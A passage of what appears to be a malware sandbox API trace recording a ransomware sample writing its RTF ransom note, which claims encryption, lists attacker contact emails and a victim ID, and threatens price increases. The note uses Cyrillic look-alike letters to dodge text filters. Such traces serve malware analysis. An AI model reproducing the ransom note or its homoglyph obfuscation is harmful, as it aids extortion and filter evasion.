\\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0066.279] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x1ea3958, cbMultiByte=7247, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our 